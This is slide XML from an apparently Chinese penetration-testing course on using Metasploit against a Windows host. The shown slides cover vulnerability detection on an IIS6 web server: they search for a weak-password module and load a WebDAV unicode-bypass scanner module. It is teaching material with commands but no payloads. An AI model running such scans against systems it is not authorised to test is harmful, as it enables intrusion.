                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="文本框 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4912360" y="1546225"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.根据扫描结果还可以看到，目标主机开放了80端口IIS6服务，接下来对其进行漏洞检测。使用“search iis6”命令查找IIS6 服务的弱口令漏洞检测模块，如图2-4-50所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4912360" y="2745105"/>
            <a:ext cx="5276850" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="文本框 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4912360" y="4631055"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-50 查找IIS6服务的弱口令漏洞检测模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Windows主机进行渗透测试</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="文本框 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5055870" y="774700"/>
            <a:ext cx="6300470" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“use auxiliary/scanner/http/dir_webday_unicode_bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”命令调用模块并查看需要配置的参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2-4-51</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5116195" y="1834832"/>
            <a:ext cx="5276850" cy="3190875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="文本框 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5055870" y="5164137"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-51 调用模块并查看需要配置的参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Windows主机进行渗透测试</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
